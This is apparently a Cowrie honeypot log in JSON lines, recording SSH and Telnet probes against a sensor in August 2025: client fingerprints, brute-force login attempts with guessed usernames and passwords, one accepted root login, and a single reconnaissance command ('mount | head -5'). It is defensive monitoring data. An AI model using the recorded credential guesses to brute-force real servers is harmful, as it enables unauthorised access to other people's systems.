{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:53:07.382039Z","src_ip":"212.227.235.229","session":"370492b8e71c"}
{"eventid":"cowrie.login.failed","username":"test","password":"p4$w0rd","message":"login attempt [test/p4$w0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T23:53:11.951275Z","src_ip":"212.227.235.229","session":"370492b8e71c"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:53:13.993941Z","src_ip":"212.227.235.229","session":"370492b8e71c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:53:56.439180Z","src_ip":"212.227.125.160","session":"bf83ee9ab7c1"}
{"eventid":"cowrie.session.closed","duration":180.1549026966095,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:53:56.444025Z","src_ip":"212.227.125.160","session":"bf83ee9ab7c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43416,"dst_ip":"1.2.3.4","dst_port":22,"session":"63a85a011a71","protocol":"ssh","message":"New connection: 212.227.235.229:43416 (1.2.3.4:22) [session: 63a85a011a71]","sensor":"my-vps","timestamp":"2025-08-26T23:54:10.365856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:54:10.366875Z","src_ip":"212.227.235.229","session":"63a85a011a71"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T23:54:10.538505Z","src_ip":"212.227.235.229","session":"63a85a011a71"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:54:18.365095Z","src_ip":"212.227.235.229","session":"63a85a011a71"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53630,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ca932ea3feb","protocol":"ssh","message":"New connection: 217.72.205.35:53630 (1.2.3.4:22) [session: 5ca932ea3feb]","sensor":"my-vps","timestamp":"2025-08-26T23:54:37.831895Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:54:37.833083Z","src_ip":"217.72.205.35","session":"5ca932ea3feb"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":50526,"dst_ip":"1.2.3.4","dst_port":22,"session":"87eb964390b5","protocol":"ssh","message":"New connection: 93.123.109.189:50526 (1.2.3.4:22) [session: 87eb964390b5]","sensor":"my-vps","timestamp":"2025-08-26T23:54:47.417848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:54:47.418961Z","src_ip":"93.123.109.189","session":"87eb964390b5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T23:54:47.438273Z","src_ip":"93.123.109.189","session":"87eb964390b5"}
{"eventid":"cowrie.login.failed","username":"massa","password":"massa","message":"login attempt [massa/massa] failed","sensor":"my-vps","timestamp":"2025-08-26T23:54:47.498102Z","src_ip":"93.123.109.189","session":"87eb964390b5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:54:48.519473Z","src_ip":"93.123.109.189","session":"87eb964390b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43466,"dst_ip":"1.2.3.4","dst_port":22,"session":"5667d929ebaa","protocol":"ssh","message":"New connection: 212.227.235.229:43466 (1.2.3.4:22) [session: 5667d929ebaa]","sensor":"my-vps","timestamp":"2025-08-26T23:55:31.216252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:55:32.137552Z","src_ip":"212.227.235.229","session":"5667d929ebaa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:55:32.138889Z","src_ip":"212.227.235.229","session":"5667d929ebaa"}
{"eventid":"cowrie.login.failed","username":"test","password":"P4$word","message":"login attempt [test/P4$word] failed","sensor":"my-vps","timestamp":"2025-08-26T23:55:36.166889Z","src_ip":"212.227.235.229","session":"5667d929ebaa"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:55:38.244844Z","src_ip":"212.227.235.229","session":"5667d929ebaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53156,"dst_ip":"1.2.3.4","dst_port":22,"session":"887702f3a0c8","protocol":"ssh","message":"New connection: 212.227.235.229:53156 (1.2.3.4:22) [session: 887702f3a0c8]","sensor":"my-vps","timestamp":"2025-08-26T23:57:51.667042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:57:52.627955Z","src_ip":"212.227.235.229","session":"887702f3a0c8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:57:52.628768Z","src_ip":"212.227.235.229","session":"887702f3a0c8"}
{"eventid":"cowrie.login.failed","username":"test","password":"p4$word","message":"login attempt [test/p4$word] failed","sensor":"my-vps","timestamp":"2025-08-26T23:57:56.878480Z","src_ip":"212.227.235.229","session":"887702f3a0c8"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:57:58.815804Z","src_ip":"212.227.235.229","session":"887702f3a0c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57823,"dst_ip":"1.2.3.4","dst_port":22,"session":"382348011701","protocol":"ssh","message":"New connection: 212.227.125.160:57823 (1.2.3.4:22) [session: 382348011701]","sensor":"my-vps","timestamp":"2025-08-26T23:58:29.429039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:58:29.429726Z","src_ip":"212.227.125.160","session":"382348011701"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T23:58:29.553922Z","src_ip":"212.227.125.160","session":"382348011701"}
{"eventid":"cowrie.login.success","username":"root","password":"1qw23er4","message":"login attempt [root/1qw23er4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:58:29.924048Z","src_ip":"212.227.125.160","session":"382348011701"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:58:30.212860Z","src_ip":"212.227.125.160","session":"382348011701"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-26T23:58:30.213516Z","src_ip":"212.227.125.160","session":"382348011701"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:58:30.338151Z","src_ip":"212.227.125.160","session":"382348011701"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:58:30.339482Z","src_ip":"212.227.125.160","session":"382348011701"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55489,"dst_ip":"1.2.3.4","dst_port":23,"session":"6620501ee259","protocol":"telnet","message":"New connection: 212.227.235.229:55489 (1.2.3.4:23) [session: 6620501ee259]","sensor":"my-vps","timestamp":"2025-08-26T23:59:16.485041Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35664,"dst_ip":"1.2.3.4","dst_port":22,"session":"765781b0c70d","protocol":"ssh","message":"New connection: 212.227.235.229:35664 (1.2.3.4:22) [session: 765781b0c70d]","sensor":"my-vps","timestamp":"2025-08-26T23:59:31.225753Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-26T23:59:31.227146Z","src_ip":"212.227.235.229","session":"765781b0c70d"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:59:31.227931Z","src_ip":"212.227.235.229","session":"765781b0c70d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35722,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ffe7b9b7d0f","protocol":"ssh","message":"New connection: 212.227.235.229:35722 (1.2.3.4:22) [session: 3ffe7b9b7d0f]","sensor":"my-vps","timestamp":"2025-08-26T23:59:32.725384Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T23:59:32.727533Z","src_ip":"212.227.235.229","session":"3ffe7b9b7d0f"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:59:32.728443Z","src_ip":"212.227.235.229","session":"3ffe7b9b7d0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40430,"dst_ip":"1.2.3.4","dst_port":22,"session":"311bae316783","protocol":"ssh","message":"New connection: 212.227.125.160:40430 (1.2.3.4:22) [session: 311bae316783]","sensor":"my-vps","timestamp":"2025-08-26T23:59:43.499454Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-26T23:59:43.500763Z","src_ip":"212.227.125.160","session":"311bae316783"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:59:43.501741Z","src_ip":"212.227.125.160","session":"311bae316783"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53884,"dst_ip":"1.2.3.4","dst_port":22,"session":"045dfd6fd516","protocol":"ssh","message":"New connection: 212.227.125.160:53884 (1.2.3.4:22) [session: 045dfd6fd516]","sensor":"my-vps","timestamp":"2025-08-26T23:59:46.198602Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T23:59:46.200702Z","src_ip":"212.227.125.160","session":"045dfd6fd516"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:59:46.201383Z","src_ip":"212.227.125.160","session":"045dfd6fd516"}